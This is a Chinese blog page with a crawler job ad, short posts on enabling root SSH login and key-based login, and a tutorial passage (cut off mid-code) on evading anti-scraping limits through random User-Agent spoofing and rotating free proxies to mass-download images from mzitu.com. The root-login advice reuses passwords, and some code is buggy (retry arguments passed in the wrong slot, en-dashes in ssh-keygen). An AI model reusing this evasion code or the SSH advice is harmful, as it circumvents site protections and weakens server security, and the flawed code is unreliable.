职位推荐 百观科技 - 爬虫数据工程师

Hi，爬虫学习得还不错吧？做了这么久的爬虫，想不想找一份充分施展才华的工作？博主最近去参观了一下百观科技，在北京，感觉非常不错，公司人也超级好！不过博主现在还在念书，现在还不能去啦~ 在这里将职位推荐给大家，如果你对爬虫非常感兴趣，那么强烈推荐你来！待遇丰厚着呢~

关于百观

百观Lab是一个年轻开放，硅谷风格的金融数据技术公司，致力于给全球投资机构抓取、分析、可视化非常规数据的产品。我们的客户将是管理规模一亿美金以上的国际投资机构，涉及的投资决策上千万美金。百观已获得真格基金、金沙江合伙人等百万美金天使投资。公司官网相关新闻

公司待遇

为了做出最棒的产品，公司需要同样充满好奇心，技艺高超的小伙伴。我们提供：

BAT同等级待遇
股权激励
超棒的办公环境，紧邻雍和宫五道营 # 我们也不喜欢西二旗
弹性工作制 # 我们也不相信996
有趣的同事
和百观技术顾问团交流学习的机会(百度机器学习T9, 前豌豆荚资深架构师，斯坦福AI博士等)
MacBook Pro，零食饮料，免费午餐
免费口罩，北京嘛…

职位

数据工程师

职责：

探索并实践前沿爬虫技术与存储技术
分布式爬虫系统的开发，维护，与优化

要求：

热爱技术，对解决具有挑战性问题富有激情，学习能力和求知欲强
具备强悍的编码能力，内功扎实
熟悉linux开发环境，熟悉python，毕竟life is short
有过分布式爬虫开发经验，熟悉多线程、网络通信、代理池等相关概念；熟悉scrapy+redis/pyspider/mongodb者优先
可提供Github/OSChina/StackOverflow/V2EX/知乎/csdn等id的优先
一线大学计算机或相关专业
阅读英文技术文档无障碍

简历投递

简历投递至 ted@baiguanlab.com 微信联系 cdfcdf789 有意向的赶快发简历加微信啦~

作者崔庆才发表于 2016-11-03 阅读次数：本文字数： 749 阅读时长 ≈ 1 分钟

需求分析

有需求才有动力！腾讯云有个比较坑的地方，Ubuntu 的机子必须要用 ubuntu 账号来登录，给我的统一管理带来了很大的麻烦。在这里我想把它的账号名称改成 root 来统一登录。

步骤

首先用 ubuntu 账号登录主机。然后输入

1	sudo passwd root

在这里会首先提示你输入 ubuntu 用户的账号，然后输入新设置的 root 用户的账号。在这里一共要输入三次，不过建议 root 密码和 ubuntu 密码都一样啦。然后修改 /etc/ssh/sshd_config

1	sudo vi /etc/ssh/sshd_config

把 PermitRootLogin 修改为 yes wq 保存接下来你就可以使用 root 登录了当然你还可以根据下面这篇文章配置免密码登录。免密码登录

结语

本文章介绍了腾讯云 Ubuntu 系列主机配置 root 登录的方法，希望对大家有帮助。

作者崔庆才发表于 2016-10-31 阅读次数：本文字数： 364 阅读时长 ≈ 1 分钟

需求分析

有需求才有动力！最近有不少服务器，但是管理起来还需要输入密码，而且有的还不一样，太麻烦了，所以就利用 SSH 配置免密码登录服务器。

流程

生成秘钥

首先在自己的电脑上生成 SSH 秘钥。

1	ssh-keygen –t rsa –P

直接回车生成秘钥对。可以看到在 ~/ 目录找到一个 .ssh 的目录，有两个文件。 id_rsa 和 id_rsa.pub 其中一个是私钥，一个是公钥。服务器上利用同样的方法创建，保证有一个 .ssh 目录。

复制秘钥

登录服务器后，在 .ssh 目录新建一个文件，名字叫做 authorized_keys 将刚才自己电脑上生成的公钥内容复制进去，保存。然后进行权限设置

1	sudo chmod 600 authorized_keys

如此一来，配置就完成了。

验证

断开服务器，重新连接 ssh，发现就可以直接进入了。

作者崔庆才发表于 2016-10-31 阅读次数：本文字数： 345 阅读时长 ≈ 1 分钟

我又来装逼了！上次教大家写了一个下载www.mzitu.com全站图片的小爬虫练手、不知道大家消化得怎么样？大家在使用的时候会发现，跑着跑着就断掉了！报错了啊！丢失连接之类的。幸幸苦苦的抓了半天又得从头来，心累啊！这就是网站的反爬虫在起作用了，一个 IP 访问次数过于频繁就先将这个 IP 加入黑名单，过一会儿再放出来。虽然不影响正常使用但是对于爬虫来说很致命啊！因为爬虫会报错退出啊！然后我们又得重来，那么多妹子得重来多少次啊！（而且小爬虫不会识别哪些是爬取过的页面，哪些是没爬去的内容，会从头再来啊！很伤人啊！关于这一块儿我下一篇博文来教大家怎么办，这一篇我们还是先集中精力应付反爬虫吧！关于反爬虫的定义：建议大家去看看这个 blog: 点我 一般来说我们会遇到网站反爬虫策略下面几点：

限制 IP 访问频率，超过频率就断开连接。（这种方法解决办法就是，降低爬虫的速度在每个请求前面加上 time.sleep；或者不停的更换代理 IP，这样就绕过反爬虫机制啦！）
后台对访问进行统计，如果单个 userAgent 访问超过阈值，予以封锁。（效果出奇的棒！不过误伤也超级大，一般站点不会使用，不过我们也考虑进去
还有针对于 cookies 的（这个解决办法更简单，一般网站不会用）

我们今天就来针对 1、2 两点来写个下载模块、别害怕真的很简单。首先，这次我们需要用到 Python 中的 re 模块来提取内容，很简单的用法，但是也需要各位了解一下：点我查看正则表达式基本教程首先照常我们需要下面这些模块： requests re（Python 的正则表达式模块） random（一个随机选择的模块）都是上一篇文章装过的哦！re 和 random 是 Python 自带的模块，不需要安装ヾ§ ￣ ▽)ゞ 2333333 首先按照惯例我们导入模块：

1
2
3

import requests
import re
import random

我们的思路是先找一个发布代理 IP 的网站（百度一下很多的！）从这个网站爬取出代理 IP 用来访问网页；当本地 IP 失效时，开始使用代理 IP，代理 IP 失败六次后取消代理 IP。下面我们开整ヽ(●-`Д´-)ノ首先我们写一个基本的请求网页并返回 response 的函数:

import requests
import re
import random


class download:

    def get(self, url):
        return requests.get(url)

哈哈简单吧！这只是基本的，上面说过啦，很多网站都都会拒绝非浏览器的请求的、怎么区分的呢？就是你发起的请求是否包含正常的 User-Agent 这玩意儿长啥样儿？就下面这样（如果不一样请按一下 F5） requests的请求的 User-Agent 大概是这样 python-requests/2.3.0 CPython/2.6.6 Windows/7 这个不是正常的 User-Agent、所以我们得自己造一个来欺骗服务器（requests 又一个 headers 参数能帮助我们伪装成浏览器哦！不知道的小哥儿一定是没有看官方文档！这样很不好诶！o(一︿一+)o），让他以为我们是真的浏览器。上面讲过有的网站会限制相同的 User-Agent 的访问频率，那我们就给他随机来一个 User-Agent 好了！去百度一下 User-Agent，我找到了下面这些：

"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
 "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
 "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
 "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
 "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
 "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
 "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
 "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
 "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
 "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
 "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
 "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
 "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
 "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"

下面我们来改改上面的代码成这样：

import requests
import re
import random


class download:

    def __init__(self):
        self.user_agent_list = [
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
            "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
        ]

    def get(self, url):
        UA = random.choice(self.user_agent_list) ##从self.user_agent_list中随机取出一个字符串（聪明的小哥儿一定发现了这是完整的User-Agent中：后面的一半段）
        headers = {'User-Agent': UA}  ##构造成一个完整的User-Agent （UA代表的是上面随机取出来的字符串哦）
        response = requests.get(url, headers=headers) ##这样服务器就会以为我们是真的浏览器了
        return response

各位可以自己实例化测试一下，headers 会不会变哦 ε=ε=ε=(~￣ ▽ ￣)~ 好啦下面我们继续还有一个点没有处理：那就是限制 IP 频率的反爬虫。 首先是需要获取代理 IP 的网站，我找到了这个站点 http://haoip.cc/tiqu.htm（这儿本来我是准备教大家自己维护一个 IP 代理池的，不过有点麻烦啊！还好发现这个代理站，还是这么好心的站长。我就可以光明正大的偷懒啦！ヾ(≧O≦)〃嗷~）我们先把这写 IP 爬取下来吧！本来想让大家自己写，不过有用到正则表达式的，虽然简单，不过有些小哥儿（妹儿）怕是不会使。我也写出来啦.

iplist = [] ##初始化一个list用来存放我们获取到的IP
html = requests.get("http://haoip.cc/tiqu.htm")##不解释咯
iplistn = re.findall(r'r/>(.*?)<b', html.text, re.S) ##表示从html.text中获取所有r/><b中的内容，re.S的意思是包括匹配包括换行符，findall返回的是个list哦！
for ip in iplistn:
    i = re.sub('\n', '', ip)##re.sub 是re模块替换的方法，这儿表示将\n替换为空
    iplist.append(i.strip()) ##添加到我们上面初始化的list里面, i.strip()的意思是去掉字符串的空格哦！！（这都不知道的小哥儿基础不牢啊）
    print(i.strip())
print(iplist)

我们来打印一下看看下面[———————]中的内容就我们添加进 iplist 这个初始化的 list 中的内容哦！完美！！好啦现在我们把这段代码加到之前写的代码里面去；并判断是否使用了代理：

import requests
import re
import random


class download:

    def __init__(self):

        self.iplist = []  ##初始化一个list用来存放我们获取到的IP
        html = requests.get("http://haoip.cc/tiqu.htm")  ##不解释咯
        iplistn = re.findall(r'r/>(.*?)<b', html.text, re.S)  ##表示从html.text中获取所有r/><b中的内容，re.S的意思是包括匹配包括换行符，findall返回的是个list哦！
        for ip in iplistn:
            i = re.sub('\n', '', ip)  ##re.sub 是re模块替换的方法，这儿表示将\n替换为空
            self.iplist.append(i.strip())  ##添加到我们上面初始化的list里面

        self.user_agent_list = [
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
            "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
        ]

    def get(self, url, proxy=None): ##给函数一个默认参数proxy为空
        UA = random.choice(self.user_agent_list) ##从self.user_agent_list中随机取出一个字符串
        headers = {'User-Agent': UA}  ##构造成一个完整的User-Agent （UA代表的是上面随机取出来的字符串哦）

        if proxy == None: ##当代理为空时，不使用代理获取response（别忘了response啥哦！之前说过了！！）
            response = requests.get(url, headers=headers)##这样服务器就会以为我们是真的浏览器了
            return response ##返回response

        else: ##当代理不为空
            IP = ''.join(str(random.choice(self.iplist)).strip()) ##将从self.iplist中获取的字符串处理成我们需要的格式（处理了些，什么自己看哦，这是基础呢）
            proxy = {'http': IP} ##构造成一个代理
            response = requests.get(url, headers=headers, proxies=proxy) ##使用代理获取response
            return response
Xz = download() ##实例化
print(Xz.get("mzitu.com").headers) ##打印headers

需要测试的小哥儿（妹儿），可以自行测试哦。下面我开始判断什么时候需要！需要使用代理，而且还得规定一下多少次切换成代理爬取，多少次取消代理啊！我们改改代码，成下面这样：

import requests
import re
import random
import time


class download:

    def __init__(self):

        self.iplist = []  ##初始化一个list用来存放我们获取到的IP
        html = requests.get("http://haoip.cc/tiqu.htm")  ##不解释咯
        iplistn = re.findall(r'r/>(.*?)<b', html.text, re.S)  ##表示从html.text中获取所有r/><b中的内容，re.S的意思是包括匹配包括换行符，findall返回的是个list哦！
        for ip in iplistn:
            i = re.sub('\n', '', ip)  ##re.sub 是re模块替换的方法，这儿表示将\n替换为空
            self.iplist.append(i.strip())  ##添加到我们上面初始化的list里面

        self.user_agent_list = [
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
            "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
        ]

    def get(self, url, timeout, proxy=None, num_retries=6): ##给函数一个默认参数proxy为空
        UA = random.choice(self.user_agent_list) ##从self.user_agent_list中随机取出一个字符串
        headers = {'User-Agent': UA}  ##构造成一个完整的User-Agent （UA代表的是上面随机取出来的字符串哦）

        if proxy == None: ##当代理为空时，不使用代理获取response（别忘了response啥哦！之前说过了！！）
            try:
                return requests.get(url, headers=headers, timeout=timeout)##这样服务器就会以为我们是真的浏览器了
            except:##如过上面的代码执行报错则执行下面的代码
                if num_retries > 0: ##num_retries是我们限定的重试次数
                    time.sleep(10) ##延迟十秒
                    print(u'获取网页出错，10S后将获取倒数第：', num_retries, u'次')
                    return self.get(url, timeout, num_retries-1)  ##调用自身 并将次数减1
                else:
                    print(u'开始使用代理')
                    time.sleep(10)
                    IP = ''.join(str(random.choice(self.iplist)).strip()) ##下面有解释哦
                    proxy = {'http': IP}
                    return self.get(url, timeout, proxy,) ##代理不为空的时候

        else: ##当代理不为空
            IP = ''.join(str(random.choice(self.iplist)).strip()) ##将从self.iplist中获取的字符串处理成我们需要的格式（处理了些什么自己看哦，这是基础呢）
            proxy = {'http': IP} ##构造成一个代理
            return requests.get(url, headers=headers, proxies=proxy, timeout = timeout) ##使用代理获取response
Xz = download() ##实例化
print(Xz.get("mzitu.com", 3)) ##打印headers

上面代码添加了一个 timeout （防止超时）、一个 num_retries=6（限制次数，6 次过后使用代理）。下面我们让使用代理失败 6 次后，取消代理，直接上代码：

import requests
import re
import random
import time


class download:

    def __init__(self):

        self.iplist = []  ##初始化一个list用来存放我们获取到的IP
        html = requests.get("http://haoip.cc/tiqu.htm")  ##不解释咯
        iplistn = re.findall(r'r/>(.*?)<b', html.text, re.S)  ##表示从html.text中获取所有r/><b中的内容，re.S的意思是包括匹配包括换行符，findall返回的是个list哦！
        for ip in iplistn:
            i = re.sub('\n', '', ip)  ##re.sub 是re模块替换的方法，这儿表示将\n替换为空
            self.iplist.append(i.strip())  ##添加到我们上面初始化的list里面

        self.user_agent_list = [
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
            "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
        ]

    def get(self, url, timeout, proxy=None, num_retries=6): ##给函数一个默认参数proxy为空
        print(u'开始获取：', url)
        UA = random.choice(self.user_agent_list) ##从self.user_agent_list中随机取出一个字符串
        headers = {'User-Agent': UA}  ##构造成一个完整的User-Agent （UA代表的是上面随机取出来的字符串哦）

        if proxy == None: ##当代理为空时，不使用代理获取response（别忘了response啥哦！之前说过了！！）
            try:
                return requests.get(url, headers=headers, timeout=timeout)##这样服务器就会以为我们是真的浏览器了
            except:##如过上面的代码执行报错则执行下面的代码

                if num_retries > 0: ##num_retries是我们限定的重试次数
                    time.sleep(10) ##延迟十秒
                    print(u'获取网页出错，10S后将获取倒数第：', num_retries, u'次')
                    return self.get(url, timeout, num_retries-1)  ##调用自身 并将次数减1
                else:
                    print(u'开始使用代理')
                    time.sleep(10)
                    IP = ''.join(str(random.choice(self.iplist)).strip()) ##下面有解释哦
                    proxy = {'http': IP}
                    return self.get(url, timeout, proxy,) ##代理不为空的时候

        else: ##当代理不为空
            try:
                IP = ''.join(str(random.choice(self.iplist)).strip()) ##将从self.iplist中获取的字符串处理成我们需要的格式（处理了些什么自己看哦，这是基础呢）
                proxy = {'http': IP} ##构造成一个代理
                return requests.get(url, headers=headers, proxies=proxy, timeout=timeout) ##使用代理获取response
            except:

                if num_retries > 0:
                    time.sleep(10)
                    IP = ''.join(str(random.choice(self.iplist)).strip())
                    proxy = {'http': IP}
                    print(u'正在更换代理，10S后将重新获取倒数第', num_retries, u'次')
                    print(u'当前代理是：', proxy)
                    return self.get(url, timeout, proxy, num_retries - 1)
                else:
                    print(u'代理也不好使了！取消代理')
                    return self.get(url, 3)

收工一个较为健壮的下载模块搞定（当然一个健壮的模块还应该有其它的内容，比如判断地址是否是 robots.txt 文件禁止获取的；错误状态判断是否是服务器出错，限制爬虫深度防止掉入爬虫陷进之类的····）不过我怕太多大家消化不了，而且我们一般遇到的网站基本不会碰到爬虫陷阱（有也不怕啊，反正规模不大，自己也就注意到了。）下面我们来把这个下载模块使用到我们上一篇博文的爬出红里面去！用法很简单！ヾ(´▽‘)ﾉ将这个 py 文件放在和上一篇博文爬虫相同的文件夹里面；并新建一个init.py 的文件。像这样：在爬虫里面导入下载模块即可，class 继承一下下载模块；然后替换掉上一篇爬虫里面的全部 requests.get，为 download.get 即可！还必须加上 timeout 参数哦！废话不多说直接上代码：

from bs4 import BeautifulSoup
import os
from Download import download

class mzitu(download):

    def all_url(self, url):
        html = download.get(self, url, 3) ##这儿替换了，并加上timeout参数
        all_a = BeautifulSoup(html.text, 'lxml').find('div', class_='all').find_all('a')
        for a in all_a:
            title = a.get_text()
            print(u'开始保存：', title)
            path = str(title).replace("?", '_')
            self.mkdir(path)
            os.chdir("D:\mzitu\\"+path)
            href = a['href']
            self.html(href)

    def html(self, href):
        html = download.get(self, href, 3)
        max_span = BeautifulSoup(html.text, 'lxml').find_all('span')[10].get_text()
        for page in range(1, int(max_span) + 1):
            page_url = href + '/' + str(page)
            self.img(page_url)

    def img(self, page_url):
        img_html = download.get(self, page_url, 3) ##这儿替换了
        img_url = BeautifulSoup(img_html.text, 'lxml').find('div', class_='main-image').find('img')['src']
        self.save(img_url)

    def save(self, img_url):
        name = img_url[-9:-4]
        print(u'开始保存：', img_url)
        img = download.get(self, img_url, 3) ##这儿替换了，并加上timeout参数
        f = open(name + '.jpg', 'ab')
        f.write(img.content)
        f.close()

    def mkdir(self, path): ##这个函数创建文件夹
        path = path.strip()
        isExists = os.path.exists(os.path.join("D:\mzitu", path))
        if not isExists:
            print(u'建了一个名字叫做', path, u'的文件夹！')
            os.makedirs(os.path.join("D:\mzitu", path))
            return True
        else:
            print(u'名字叫做', path, u'的文件夹已经存在了！')
            return False

Mzitu = mzitu() ##实例化
Mzitu.all_url('http://www.mzitu.com/all') ##给函数all_url传入参数  你可以当作启动爬虫（就是入口）

好了！搞完收工！大家可以看一下和上一次我们写的爬虫有哪些变化就知道我们做了什么啦！ 2016/11/4 更新：今天做教程的时候发现我忽略了一个问题，上面的写法，属于子类继承父类，这种写法子类没法用init;所以我改了一下写法，（其余都没变，不用担心。）直接贴代码了：首先是下载模块（Download.py）:

import requests
import re
import random
import time


class download():

    def __init__(self):

        self.iplist = []  ##初始化一个list用来存放我们获取到的IP
        html = requests.get("http://haoip.cc/tiqu.htm")  ##不解释咯
        iplistn = re.findall(r'r/>(.*?)<b', html.text, re.S)  ##表示从html.text中获取所有r/><b中的内容，re.S的意思是包括匹配包括换行符，findall返回的是个list哦！
        for ip in iplistn:
            i = re.sub('\n', '', ip)  ##re.sub 是re模块替换的方法，这儿表示将\n替换为空
            self.iplist.append(i.strip())  ##添加到我们上面初始化的list里面

        self.user_agent_list = [
